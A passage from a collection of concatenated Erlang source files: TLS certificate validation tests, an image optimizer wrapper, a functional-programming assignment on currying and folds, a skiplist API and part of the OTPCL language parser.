tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "good_certificate.pem",
fun ({ok, Socket}) ->
ssl:close(Socket)
end).
expired_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "expired_certificate.pem",
fun ({error, {tls_alert, {certificate_expired, _}}}) ->
ok
end).
future_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "future_certificate.pem",
fun ({error, {tls_alert, {certificate_expired, _}}}) ->
ok
end).
wrong_host_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "wrong.host.pem", "wrong.host_key.pem",
fun ({error, {tls_alert, {handshake_failure, _}}}) ->
ok
end).
self_signed_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "self_signed.pem", "self_signed_key.pem",
fun ({error, {tls_alert, {bad_certificate, _}}}) ->
ok
end).
unknown_ca_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "unknown_ca.pem",
fun ({error, {tls_alert, {unknown_ca, _}}}) ->
ok
end).
misordered_chain_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
chain, "misordered_chain.pem",
fun ({ok, Socket}) ->
ssl:close(Socket)
end).
%% ------------------------------------------------------------------
%% Internal
%% ------------------------------------------------------------------
real_certificate_test_recur([Url | Next]) ->
ct:pal("Trying ~p", [Url]),
Headers = [{"connection", "close"}],
HttpOpts = [{ssl, tls_certificate_check:options(Url)}],
Opts = [],
case httpc:request(head, {Url, Headers}, HttpOpts, Opts) of
{ok, {{_, StatusCode, _}, _, _}}
when is_integer(StatusCode) ->
ok;
{error, Reason} ->
?assertNotMatch({error, {failed_connect, [{to_address, {_, _}},
{inet, [inet], {tls_alert, _}}]}},
Reason),
ct:pal("Failed: ~p", [Reason]),
real_certificate_test_recur(Next)
end;
real_certificate_test_recur([]) ->
error('All test URLs are down (or we have no internet access)').
shuffle_list(List) ->
Weighed = [{rand:uniform(), V} || V <- List],
Sorted = lists:sort(Weighed),
[V || {_, V} <- Sorted]. | test/tls_certificate_check_options_SUITE.erl | 0.520984 | 0.433682 | tls_certificate_check_options_SUITE.erl | starcoder |
-module(image_optimizer).
-export([
optimize/1
, optimize/2
% hidden
, run/1
, os_find_executable/1
]).
-type optimizer() :: pngquant
| optipng
| jpegoptim
| cjpeg
| jpeg_recompress
| svgo
| scour
| gifsicle.
-type options() :: [option()].
-type option() :: {quality, integer()}
| {use, optimizer() | [optimizer()]}
| {quiet, true | false}
| {strip_metadata, true | false}
| {output, file:filename_all()}.
-callback optimize(Executable :: file:filename_all(), File :: file:filename_all(), Options :: options()) ->
{ok, Output :: file:filename_all()} | {error, Reason :: term()}.
% @equiv optimize(File, [])
optimize(File) ->
optimize(File, []).
% @doc
% Optimize an image file
% @end
-spec optimize(File :: file:filename_all(), Options :: options()) -> {ok, file:filename_all()} | {error, term()} | {error, integer(), string()}.
optimize(File, Options) ->
case filelib:is_regular(bucs:to_string(File)) of
true ->
case optimizer(bucs:to_string(File), Options) of
undefined ->
{error, invalid_file};
Optimizers ->
optimize(Optimizers, File, Options, {error, optimizer_not_found})
end;
false ->
{error, file_not_found}
end.
% @hidden
run(Cmd) ->
bucos:run(Cmd, [{timeout, infinity}, stdout_on_error, display_stdout, {return, combined, all}]).
optimize([], _File, _Options, Error) -> Error;
optimize([Optimizer|Rest], File, Options, Error) ->
Module = bucs:to_atom(lists:flatten(io_lib:format("image_optimizer_~s", [Optimizer]))),
case find_executable(Optimizer) of
false ->
optimize(Rest, File, Options, Error);
AppPath ->
case bucs:apply(Module, optimize, [AppPath, File, Options], {error, optimizer_not_found}) of
{error, optimizer_not_found} ->
optimize(Rest, File, Options, Error);
NewError when element(1, NewError) == error ->
optimize(Rest, File, Options, NewError);
{ok, _Filename} = Ok ->
Ok
end
end.
optimizer("png") -> [pngquant, optipng];
optimizer("jpeg") -> [jpegoptim, cjpeg, jpeg_recompress];
optimizer("jpg") -> [jpegoptim, cjpeg, jpeg_recompress];
optimizer("svg") -> [svgo, scour];
optimizer("gif") -> [gifsicle];
optimizer(_) -> undefined.
optimizer(File, Options) ->
case proplists:get_value(use, Options, undefined) of
undefined ->
case proplists:get_bool(identify, Options) of
true ->
case find_executable(identify) of
false ->
optimizer_by_extension(File);
Identify ->
case bucos:run({"~ts -format \"%m\" \"~ts\"", [Identify, File]}) of
{ok, Format} ->
optimizer(bucstring:lowercase(Format));
_ ->
undefined
end
end;
false ->
optimizer_by_extension(File)
end;
Optimizers ->
case is_list(Optimizers) of
true ->
Optimizers;
false ->
[Optimizers]
end
end.
optimizer_by_extension(File) ->
case filename:extension(File) of
[$.|Extension] ->
optimizer(bucstring:lowercase(Extension));
_ ->
undefined
end.
find_executable(Exec) when is_atom(Exec) ->
case doteki:get_env([image_optimizer, Exec], undefined) of
undefined ->
case image_optimizer:os_find_executable(bucs:to_string(Exec)) of
false ->
false;
AppPath ->
AppPath
end;
AppPath ->
case bucfile:is_executable(AppPath) of
#{owner := false,
group := false,
other := false} ->
false;
_ ->
bucs:to_string(AppPath)
end
end.
% @hidden
% Needed for tests
os_find_executable(Exec) ->
os:find_executable(Exec). | src/image_optimizer.erl | 0.550849 | 0.442998 | image_optimizer.erl | starcoder |
%%%--------------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2017, <COMPANY>
%%% @doc
%%%
%%% @end
%%% Created : 05. Jul 2017 12:36 AM
%%%--------------------------------------------------------------------------
-module(assign5).
-author("<NAME>").
%% API
-export([add/1, subtract/1, multiply/1, divide/1, greaterThanX/1,
lessThanX/1, derive/2, integral/4, multiplyElements/2, filterGreaterThan/2,
maxElement/1, sumElements/1, closestZero/1, myfoldl/2, foldl/2, foldr/2,
add/2, subtract/2, multiply/2, divide/2, greaterThanX/2, lessThanX/2]).
%-----------------------------------------------------------------------------
% Q1
%Returns a function to add X with the parameter passed to the func i.e Y.
add(X) ->
fun(Y) -> X + Y
end.
%Returns X + Y using curried form of add.
add(X, Y) ->
F = add(X),
F(Y).
%Returns a function to subtract X from the parameter passed to the func i.e Y.
subtract(X) ->
fun(Y) -> Y - X
end.
%Returns X - Y using curried form of subtract.
subtract(X, Y) -> (subtract(Y))(X).
%Returns a function to multiply X with the parameter passed to the func i.e Y.
multiply(X) ->
fun(Y) -> X * Y
end.
%Returns X * Y using curried form of multiply.
multiply(X, Y) -> (multiply(X))(Y).
%Returns a function to divide the parameter passed to the func i.e Y with X.
divide(X) ->
fun(Y) -> Y / X
end.
%Returns X / Y using curried form of divide.
divide(X, Y) -> (divide(Y))(X).
%Returns a function which tells if the parameter passed to the func i.e Y is greater than X.
greaterThanX(X) ->
fun(Y) -> Y > X
end.
%Tells if X > Y using curried form of greaterThanX.
greaterThanX(X, Y) -> (greaterThanX(X))(Y).
%Returns a function which tells if the parameter passed to the func i.e Y is less than X.
lessThanX(X) ->
fun(Y) -> Y < X
end.
%Tells if X < Y using curried form of lessThanX.
lessThanX(X, Y) -> (lessThanX(X))(Y).
%--------------------------------------------------------------------------------------------
% Returns the two elements of list whose sum is closest to zero.
closestZero([H | T]) ->
F = fun(X, [A, B]) ->
case greaterThanX(abs(add(A,B)),abs(add(A,X))) of
true -> [A, B];
false -> [A, X]
end end,
loopClosestZero(F, [H, hd(T)], T).
loopClosestZero(_, [A, B], [_]) ->
io:format("Closest to Zero : ( ~w ) + ( ~w ) = ~w ~n", [A, B, A + B]);
loopClosestZero(F, Acc, T) -> loopClosestZero(F, lists:foldl(F, Acc, T), tl(T)).
%Multiply each element of list L by N.
multiplyElements(L, N) ->
F = multiply(N),
lists:map(fun(X) -> F(X) end, L).
%Filter the list L to elements greater than N.
filterGreaterThan(L, N) ->
F = greaterThanX(N),
lists:filter(fun(X) -> F(X) end, L).
%Returns max element of List.
maxElement([H | T]) ->
F = fun(X, Acc) ->
case (greaterThanX(Acc))(X) of
true -> X;
false -> Acc
end
end,
lists:foldl(F, H, T).
%Returns sum of elements of list L.
sumElements(L) ->
F = fun(X, Acc) -> (add(Acc))(X) end,
lists:foldl(F, 0, L).
%--------------------------------------------------------------------------------------------
%Returns a function that takes X as input, and gives the derivate of F given a given H.
derive(F, H) ->
fun(X) -> (F(X + H) - F(X)) / H
end.
%-------------------------------------------------------------------------------------------------------------------------%
%Returns the integral of F from A to B, using Simpson's rule.
integral(A, B, N, F) -> H = (B - A) / N,
(H / 3) * (sum_Y(0, N, 0, F, A, H)).
sum_Y(N, N, Ans, F, A, H) -> Ans + F(A + N * H);
sum_Y(0, N, Ans, F, A, H) -> sum_Y(1, N, Ans + F(A), F, A, H);
sum_Y(X, N, Ans, F, A, H) ->
if
X rem 2 == 0 -> sum_Y(X + 1, N, Ans + 2 * F(A + X * H), F, A, H);
true -> sum_Y(X + 1, N, Ans + 4 * F(A + X * H), F, A, H)
end.
%-------------------------------------------------------------------------------------------------------------------------%
%foldl using foldr
foldl(F, [A, B]) -> lists:foldr(F, B, [A]);
foldl(F, L) -> F(foldl(F, lists:droplast(L)), lists:last(L)).
%foldl(F, X, L) -> (lists:foldr(fun(X, G) -> fun(A) -> G(F(X, A)) end end, fun(X) -> X end, L))(X).
%Another implementaion of foldl using foldr.
myfoldl(_, [X]) -> X;
myfoldl(F, L) ->
Once = foldFirstPair(F, L), myfoldl(F, [Once] ++ tl(tl(L))).
foldFirstPair(F, [A, B]) -> F(A, B);
foldFirstPair(F, L) ->
Last = lists:last(L),
Drop = lists:droplast(L),
lists:foldr(fun(_, _) -> foldFirstPair(F, Drop) end, Last, Drop).
%-------------------------------------------------------------------------------------------------------------------------%
%foldr using foldl.
foldr(F, [A, B]) -> lists:foldl(F, A, [B]);
foldr(F, [H | T]) -> F(foldr(F, T), H).
%-------------------------------------------------------------------------------------------------------------------------%
%Though it seems that foldl consumes the list from the start, actually it runs backwards.
%f ( ... (f (f (f (f z x1) x2) x3) x4) ...) xn where f a b is f(a,b).
%And foldr consumes the list from the end.
%f x1 (f x2 (f x3 (f x4 ... (f xn z) ... ))) where f a b is f(a,b).
%foldl is tail recursive whereas foldr recurses into an arguement.
%As it is lazy,i.e result is not calculated until it is needed,
%therefore foldr sometimes works on infinite lists.
%Universal nature of foldr.
%foldr(_, V, []) -> V;
%foldr(f, V, [H|T]) -> f(H, foldr(f, V, T)).
%The universal property of fold is that you get a bi-implication between the two equations -> g (List) = fold(f,v,List).
%It means that there could be different ways to go through elements of the list and perform some operation
%but they all are in fact same and fold is at its root. Thus being universal in nature.
%-------------------------------------------------------------------------------------------------------------------------% | FP-Erlang/Week 6/Assignment 5/Praveen/assign5.erl | 0.573559 | 0.582966 | assign5.erl | starcoder |
%% @doc API for interacting with a skiplist
-module(skiplist).
-export([
new/0,
with_capacity/1,
push_front/2,
pop_front/1,
push_back/2,
pop_back/1,
len/1,
clear/1,
is_empty/1,
insert/3,
front/1,
back/1,
nth/2,
remove/2,
to_list/1,
contains/2,
dedup/1,
modify/3
]).
%% @doc Create a new empty skiplist.
-spec new() -> {ok, reference()} | {error, any()}.
new() ->
skiplist_nif:new_skiplist().
%% @doc Create a new skiplist with specific `Capacity'.
-spec with_capacity(Capacity :: pos_integer()) -> {ok, reference()} | {error, any()}.
with_capacity(Capacity) ->
skiplist_nif:with_capacity_skiplist(Capacity).
%% @doc Push `Value' to the front of the skiplist.
-spec push_front(Skiplist :: reference(), Value :: integer()) -> ok | {error, any()}.
push_front(Skiplist, Value) ->
skiplist_nif:push_front_skiplist(Skiplist, Value).
%% @doc Pop from front of the skiplist. Mutates the existing skiplist.
-spec pop_front(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
pop_front(Skiplist) ->
skiplist_nif:pop_front_skiplist(Skiplist).
%% @doc Push `Value' to the back of the skiplist.
-spec push_back(Skiplist :: reference(), Value :: integer()) -> ok | {error, any()}.
push_back(Skiplist, Value) ->
skiplist_nif:push_back_skiplist(Skiplist, Value).
%% @doc Pop from back of the skiplist. Mutates the existing skiplist.
-spec pop_back(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
pop_back(Skiplist) ->
skiplist_nif:pop_back_skiplist(Skiplist).
%% @doc Return length of the skiplist.
-spec len(Skiplist :: reference()) -> non_neg_integer().
len(Skiplist) ->
skiplist_nif:len_skiplist(Skiplist).
%% @doc Empties the skiplist.
-spec clear(Skiplist :: reference()) -> ok | {error, any()}.
clear(Skiplist) ->
skiplist_nif:clear_skiplist(Skiplist).
%% @doc Returns `true' if the skiplist is empty, `false' otherwise.
-spec is_empty(Skiplist :: reference()) -> boolean().
is_empty(Skiplist) ->
?MODULE:len(Skiplist) == 0.
%% @doc Get the value from the front of the skiplist. Does not mutate the skiplist.
-spec front(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
front(Skiplist) ->
skiplist_nif:front_skiplist(Skiplist).
%% @doc Get the value from the back of the skiplist. Does not mutate the skiplist.
-spec back(Skiplist :: reference()) -> {ok, integer()} | {error, any()}.
back(Skiplist) ->
skiplist_nif:back_skiplist(Skiplist).
%% @doc Get the value at the `nth' index of the skiplist. Does not mutate the skiplist.
-spec nth(Skiplist :: reference(), Index :: non_neg_integer()) -> {ok, integer()} | {error, any()}.
nth(Skiplist, Index) ->
skiplist_nif:get_skiplist(Skiplist, Index).
%% @doc Remove the value at the specified index of the skiplist. Mutates the skiplist.
-spec remove(Skiplist :: reference(), Index :: non_neg_integer()) ->
{ok, integer()} | {error, any()}.
remove(Skiplist, Index) ->
case Index >= ?MODULE:len(Skiplist) of
true -> {error, index_out_of_bounds};
false -> skiplist_nif:remove_skiplist(Skiplist, Index)
end.
%% @doc Insert `Value' at the `Index' of the skiplist.
-spec insert(Skiplist :: reference(), Value :: integer(), Index :: non_neg_integer()) ->
ok | {error, any()}.
insert(Skiplist, Value, Index) ->
case Index > ?MODULE:len(Skiplist) of
true -> {error, index_out_of_bounds};
false -> skiplist_nif:insert_skiplist(Skiplist, Value, Index)
end.
%% @doc Converst the skiplist reference to erlang style list.
-spec to_list(Skiplist :: reference()) -> [integer()].
to_list(Skiplist) ->
Len = ?MODULE:len(Skiplist),
lists:reverse(
lists:foldl(
fun(I, Acc) ->
case ?MODULE:nth(Skiplist, I) of
{ok, Value} -> [Value | Acc];
{error, _} -> Acc
end
end,
[],
lists:seq(1, Len)
)
).
%% @doc Checks whether the skiplist contains the given `Value'.
-spec contains(Skiplist :: reference(), Value :: integer()) -> boolean().
contains(Skiplist, Value) ->
skiplist_nif:contains_skiplist(Skiplist, Value).
%% @doc Removes consecutive duplicates items from the skiplist. Mutates the skiplist.
-spec dedup(Skiplist :: reference()) -> ok.
dedup(Skiplist) ->
skiplist_nif:dedup_skiplist(Skiplist).
%% @doc Modify the skiplist and insert `Value' at the given `Index'.
-spec modify(Skiplist :: reference(), Value :: integer(), Index :: non_neg_integer()) ->
ok | {error, any()}.
modify(Skiplist, Value, Index) ->
skiplist_nif:modify_skiplist(Skiplist, Value, Index). | src/skiplist.erl | 0.609408 | 0.460774 | skiplist.erl | starcoder |
% @doc OTPCL's parser.
%
% Unlike most Erlang-derived languages, OTPCL's parser is not based on
% leex/yecc; rather, it's written by hand (as a side note: the author has no
% idea exactly what sort of parser OTPCL's parser actually is, though "recursive
% descent" sounds approximately right, given that it's recursive and it
% descends; someone who actually went to college is welcome to try to make sense
% of this module and provide a better explanation of what sort of parser it
% implements). The parser is (as far as the author can surmise) linear and
% relatively efficient, albeit only because it "cheats" by punting some things
% to the interpreter (notably: the parser treats numbers as atoms, so the
% interpreter is required to reparse atoms if it wants to be able to interpret
% them as numbers).
%
% == Syntax ==
%
% A "free" character is a character that is neither escaped (i.e. immediately
% preceded by a backslash character, provided that backslash character is itself
% "free") nor already part of a lower-level construct.
%
% A program is a list of statements separated by contiguous sequences of free
% vertical whitespace characters or semicolons.
%
% A statement is a list of words separated by contiguous sequences of free
% horizontal whitespace characters (escaped vertical whitespace characters are
% considered to be horizontal whitespace characters). Statements may be treated
% as "commands" in certain contexts (e.g. commands are specifically the
% top-level children of a program).
%
% A word is a braced string, double-quoted string, backquoted charlist,
% single-quoted atom, braced variable, unquoted variable, function call, list,
% tuple, comment, pipe, or unquoted atom.
%
% A braced string is a free opening curly brace, followed by zero or more
% characters and/or braced strings, followed by a free closing curly brace.
% That is: a braced string can be inside a braced string (and curly braces not
% intended to begin/end an inner braced string should be escaped with an
% immediately-preceding backslash).
%
% A double-quoted string is a free double-quote, followed by zero or more
% characters, followed by a free double-quote.
%
% A backquoted charlist is a free backquote, followed by zero or more
% characters, followed by a free backquote.
%
% A single-quoted atom is a free single-quote, followed by zero or more
% characters, followed by a free single-quote.
%
% A braced variable is a free dollar-sign, followed by a braced string.
%
% An unquoted variable is a free dollar-sign, followed by a contiguous sequence
% of characters, terminated by the next free whitespace, semicolon, or (when
% expected by the parser) closing parenthesis, square bracket, angle bracket, or
% curly brace. Unquoted variables may not contain free opening parentheses,
% square brackets, angle brackets, or curly braces; if encountered, the parser
% will immediately return an error (this may change in the future).
%
% A function call is a free opening square bracket, followed by a statement,
% followed by a free closing square bracket. It is currently an error for a
% function call to contain more or less than one statement (this may change in
% the future).
%
% A list is a free opening parenthesis, followed by a statement (note: the
% statement is treated purely as a list of words), followed by a free closing
% parenthesis. It is currently an error for a list to contain more than one
% statement (this will change in the future).
%
% A tuple is a free opening angle bracket, followed by a statement (note: the
% statement is treated purely as a list of words), followed by a free closing
% angle bracket. It is currently an error for a tuple to contain more than one
% statement (this will change in the future).
%
% A comment is a free octothorpe, followed by a contiguous sequence of
% characters, terminated by the next vertical whitespace character. A comment
% terminates the statement in which it is encountered.
%
% A pipe is a free pipe character, followed optionally by a contiguous sequence
% of characters, terminated by the next free whitespace. The pipe itself is
% parsed as an unquoted atom, which becomes the first word in a new statement.
%
% An unquoted atom is a contiguous sequence of characters, terminated by the
% next free whitespace, semicolon, or (when expected by the parser) closing
% parenthesis, square bracket, angle bracket, or curly brace. Unquoted atoms
% may not contain free opening parentheses, square brackets, angle brackets, or
% curly braces; if encountered, the parser will immediately return an error
% (this may change in the future).
%
% == Output ==
%
% OTPCL's parser does not emit the same exact structures as Erlang's parser
% (that is: it does not generate Erlang-compatible parse trees). This was
% probably a mistake (and may very well change, notably because it'd presumably
% make OTPCL compilation easier by just piggybacking on the existing
% Erlang-oriented infrastructure), but it works well enough for now.
%
% === Tokens ===
%
% The lexer makes no attempt to actually classify different types of characters
% (unlike Erlang's lexer); thus, each "token" is simply `{Char, Pos={F,L,C}}',
% where `Char' is a character code point and `Pos' is the position of that
% character (that is, `Char' came from column `C' of line `L' of file
% `F').
%
% === Trees ===
%
% The syntax tree the parser emits is a recursive 3-element tuple of the form
% `{parsed, Type, Branches}', where `Type' is an atom and `Branches' is a list
% of either tokens or trees. By default (i.e. when calling parse/1), the root
% of the tree will be a `program', with `command' and/or `comment' branches
% (`pipe's are also parsed at this level, but the parser converts those to
% `command's).
-module(otpcl_parse).
-include("otpcl.hrl").
-export([scan/1, scan/2, parse/1, parse/2, initpos/0, initpos/1]).
-ifdef(DEBUG).
-define(DEBUG_PRINT(Msg, Args), io:format(Msg, Args)).
-else.
-define(DEBUG_PRINT(Msg, Args), ok).
-endif.
%% I don't know if this really counts as "lexing", but it does
%% associate every character with a line/column, which means parse/3
%% doesn't need to care about it. Probably not memory-optimal,
%% though.
-spec scan(str_or_bin()) -> [token()].
% @doc Converts a string into a list of tokens.
scan(Txt) ->
scan(Txt, [], initpos()).
-spec scan(str_or_bin(), position()) -> [token()].
% @doc Converts a string into a list of tokens, starting at the specified
% position.
scan(Txt, Pos) ->
scan(Txt, [], Pos).
-spec scan(str_or_bin(), [token()], position()) -> [token()].
scan(Txt, Acc, Pos) when is_binary(Txt) ->
scan(binary_to_list(Txt), Acc, Pos);
scan([], Acc, _) ->
lists:reverse(Acc);
scan([Char|Rem], Acc, Pos) ->
scan(Rem, [{Char, Pos}|Acc], nextpos(Char, Pos)).
%% This is where the fun begins
-spec parse(str_or_bin()) -> parse_success() | parse_error().
% @doc Like parse/2, but defaulting to `program' as the toplevel parse tree
% element.
parse(Input) ->
parse([program], Input).
-spec parse([level(),...], str_or_bin()) -> parse_success() | parse_error().
% @doc Attempts to parse either a string or token list. Returns either a
% success response `{ok, Tree, Rem}' (where `Tree' is an OTPCL parse tree and
% `Rem' is whatever characters were left over
parse(Lvls, Input) ->
case is_text(Input) of
true -> parse(Lvls, scan(Input), []);
_ -> parse(Lvls, Input, [])
end.
%% I ain't got the fancy schmancy college edumacation to know the
%% *right* terminology for how parsers/lexers work, but here's the
%% terminology I'm using for the conventions below:
%%
%% TOKEN: do something upon matching a specific token
%% TPAIR: do something upon matching a specific pair of tokens
%% ANY: do something upon matching any token
%% EOF: do something upon running out of input tokens
%%
%% DROP: don't store the next token anywhere
%% TAKE: put the token in the current level's accumulator
%% KEEP: put the token back into the current level's remainder
%% EXIT: stop parsing the current level and either...
%% OK: ...return the resulting node or...
%% ERROR: ...return an error with the reason and accumulator
%%
%% SWITCH: replace the current level (useful for dispatching node
%% subtypes)
%% DESCEND: start a new level, then stick the resulting node in the
%% current level's accumulator
%% FLATTEN: append the current level's grandchildren (plus the
%% specified characters at the front and end) to its
%% accumulator
%% ESCAPED: the current token is an unescaped backslash, so drop it
%% and use the next token instead (usually for a TAKE)
-define(TOKEN_DROP(Lvl, Char),
parse(Lvls = [Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: dropping token ~p\n", [Lvl, Char]),
parse(Lvls, Rem, Acc)).
-define(TPAIR_DROP(Lvl, First, Second),
parse(Lvls = [Lvl|_], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: dropping token pair ~p/~p\n",
[Lvl, First, Second]),
parse(Lvls, Rem, Acc)).
-define(TOKEN_DROP_SWITCH(Old, Char, New),
parse([Old|Up], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: dropping token ~p and switching to ~p\n",
[Old, Char, New]),
parse([New|Up], Rem, Acc)).
-define(TOKEN_TAKE_DESCEND(Lvl, Char, SubLvl),
parse(Lvls = [Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: taking token ~p and descending to ~p\n",
[Lvl, Char, SubLvl]),
case parse([SubLvl|Lvls], Rem) of
{ok, Child, NewRem} ->
parse(Lvls, NewRem, [Child|Acc]);
Error ->
Error
end).
-define(TOKEN_KEEP_DESCEND(Lvl, Char, SubLvl),
parse(Lvls = [Lvl|_], Tokens = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: leaving token ~p for descent to ~p\n",
[Lvl, Char, SubLvl]),
case parse([SubLvl|Lvls], Tokens) of
{ok, Child, NewRem} ->
parse(Lvls, NewRem, [Child|Acc]);
Error ->
Error
end).
-define(TOKEN_TAKE_ESCAPED(Lvl, Char),
parse(Lvls = [Lvl|_], [$\\|[T={Char,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: taking escaped token ~p\n", [Lvl, Char]),
parse(Lvls, Rem, [T|Acc])).
-define(TOKEN_TAKE_DESCEND_FLATTEN(Lvl, Start, SubLvl, End),
parse(Lvls = [Lvl|_], [SChar = {Start,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: taking token ~p for flat descent into ~p "
++ "with ending token ~p\n",
[Lvl, Start, SubLvl, End]),
case parse([SubLvl|Lvls], Rem) of
{ok, {parsed,_,Inner}, NewRem} ->
case NewRem of
[{_,RemPos}|_] ->
EChar = {End,nextpos(End,RemPos)},
NewAcc = [EChar] ++ lists:reverse(Inner)
++ [SChar] ++ Acc,
parse(Lvls, NewRem, NewAcc);
[] ->
{error, {expected, End}, Lvl, NewRem,
lists:reverse(Inner) ++ [SChar] ++ Acc}
end;
Error ->
Error
end).
-define(TOKEN_EXIT_OK(Lvl, Char),
parse([Lvl|_], [{Char,_}|Rem], Acc) ->
?DEBUG_PRINT("~p: token ~p is a valid exit point\n",
[Lvl, Char]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Rem}).
-define(TOKEN_EXIT_ERROR(Lvl, Char, Reason),
parse([Lvl|_], Rem = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: token ~p is an invalid exit point\n",
[Lvl, Char]),
{error, Reason, Lvl, Rem, Acc}).
-define(TOKEN_KEEP_EXIT_OK(Lvl, Char),
parse([Lvl|_], Tokens = [{Char,_}|_], Acc) ->
?DEBUG_PRINT("~p: token ~p is a valid exit point; leaving for "
++ "parent\n", [Lvl, Char]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Tokens}).
-define(TPAIR_EXIT_OK(Lvl, First, Second),
parse([Lvl|_], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: token pair ~p/~p is a valid exit point\n",
[Lvl, First, Second]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Rem}).
-define(TPAIR_KEEP_EXIT_OK(Lvl, First, Second),
parse([Lvl|_], Tokens = [{First,_}|[{Second,_}|_]], Acc) ->
?DEBUG_PRINT("~p: token pair ~p/~p is a valid exit point; "
++ "leaving for parent\n", [Lvl, First, Second]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, Tokens}).
-define(TPAIR_DROP_SWITCH(Old, First, Second, New),
parse([Old|Up], [{First,_}|[{Second,_}|Rem]], Acc) ->
?DEBUG_PRINT("~p: dropping token pair ~p/~p and switching to "
++ "~p\n", [Old, First, Second, New]),
parse([New|Up], Rem, Acc)).
-define(EOF_EXIT_OK(Lvl),
parse([Lvl|_], [], Acc) ->
?DEBUG_PRINT("~p: EOF is a valid exit point\n", [Lvl]),
{ok, {parsed, Lvl, lists:reverse(Acc)}, []}).
-define(EOF_EXIT_ERROR(Lvl, Reason),
parse([Lvl|_], [], Acc) ->
?DEBUG_PRINT("~p: EOF is an invalid exit point\n", [Lvl]),
{error, Reason, Lvl, [], Acc}).
-define(ANY_KEEP_DESCEND(Lvl, SubLvl),
parse(Lvls = [Lvl|_], Tokens, Acc) ->
?DEBUG_PRINT("~p: unconditionally descending into ~p\n",
[Lvl, SubLvl]),
case parse([SubLvl|Lvls], Tokens) of
{ok, Child, Rem} ->
parse(Lvls, Rem, [Child|Acc]);
Error ->
Error
end).
-define(ANY_KEEP_SWITCH(Old, New),
parse([Old|Up], Tokens, Acc) ->
?DEBUG_PRINT("~p: unconditionally switching into ~p\n",
[Old, New]),
parse([New|Up], Tokens, Acc)).
-define(ANY_TAKE(Lvl),
parse(Lvls = [Lvl|_], [T|Rem], Acc) ->
?DEBUG_PRINT("~p: unconditionally taking token ~p\n", [Lvl,T]),
parse(Lvls, Rem, [T|Acc])).
-spec parse([level(),...], [token()], [tree()] | [token()]) ->
parse_success() | parse_error().
?EOF_EXIT_OK(program);
?TOKEN_TAKE_DESCEND(program, $#, comment);
?TOKEN_KEEP_DESCEND(program, $|, pipe);
?TOKEN_DROP(program, $\s);
?TOKEN_DROP(program, $\t);
?ANY_KEEP_DESCEND(program, command);
?EOF_EXIT_OK(command);
?TOKEN_EXIT_OK(command, $\n);
?TOKEN_EXIT_OK(command, $;);
?TOKEN_KEEP_EXIT_OK(command, $#);
?TOKEN_KEEP_EXIT_OK(command, $|);
?TPAIR_DROP(command, $\\, $\n);
?TPAIR_DROP(command, $\\, $;);
?TOKEN_DROP(command, $\s);
?TOKEN_DROP(command, $\t);
?ANY_KEEP_DESCEND(command, word);
?TOKEN_EXIT_OK(word, $\s);
?TOKEN_EXIT_OK(word, $\t);
?TOKEN_EXIT_OK(word, $\n);
?TOKEN_EXIT_OK(word, $;);
?TOKEN_KEEP_EXIT_OK(word, $#);
?TOKEN_KEEP_EXIT_OK(word, $|);
?TOKEN_DROP_SWITCH(word, ${, braced);
?TOKEN_EXIT_ERROR(word, $}, {unexpected, $}});
?TOKEN_DROP_SWITCH(word, $", double_quoted);
?TOKEN_DROP_SWITCH(word, $`, backquoted);
?TOKEN_DROP_SWITCH(word, $', single_quoted);
?TPAIR_DROP_SWITCH(word, $$, ${, var_braced);
?TOKEN_DROP_SWITCH(word, $$, var_unquoted);
?TOKEN_DROP_SWITCH(word, $[, funcall);
?TOKEN_EXIT_ERROR(word, $], {unexpected, $]});
?TOKEN_DROP_SWITCH(word, $(, list);
?TOKEN_EXIT_ERROR(word, $), {unexpected, $)});
?TOKEN_DROP_SWITCH(word, $<, tuple);
?TOKEN_EXIT_ERROR(word, $>, {unexpected, $>});
?ANY_KEEP_SWITCH(word, unquoted);
?EOF_EXIT_OK(comment);
?TOKEN_EXIT_OK(comment, $\n);
?ANY_TAKE(comment);
?EOF_EXIT_OK(pipe);
?TOKEN_KEEP_DESCEND(pipe, $|, unquoted);
?ANY_KEEP_SWITCH(pipe, command);
?EOF_EXIT_ERROR(braced, {expected, $}});
?TOKEN_EXIT_OK(braced, $});
?TOKEN_TAKE_DESCEND_FLATTEN(braced, ${, braced, $});
?TOKEN_TAKE_ESCAPED(braced, ${);
?TOKEN_TAKE_ESCAPED(braced, $});
?TOKEN_TAKE_ESCAPED(braced, $\\);
?ANY_TAKE(braced);
?EOF_EXIT_ERROR(double_quoted, {expected, $"});
?TOKEN_EXIT_OK(double_quoted, $");
?TOKEN_TAKE_ESCAPED(double_quoted, $");
?TOKEN_TAKE_ESCAPED(double_quoted, $\\);
?ANY_TAKE(double_quoted);
?EOF_EXIT_ERROR(backquoted, {expected, $`});
?TOKEN_EXIT_OK(backquoted, $`);
?TOKEN_TAKE_ESCAPED(backquoted, $`);
?TOKEN_TAKE_ESCAPED(backquoted, $\\);
?ANY_TAKE(backquoted);
?EOF_EXIT_ERROR(single_quoted, {expected, $'});
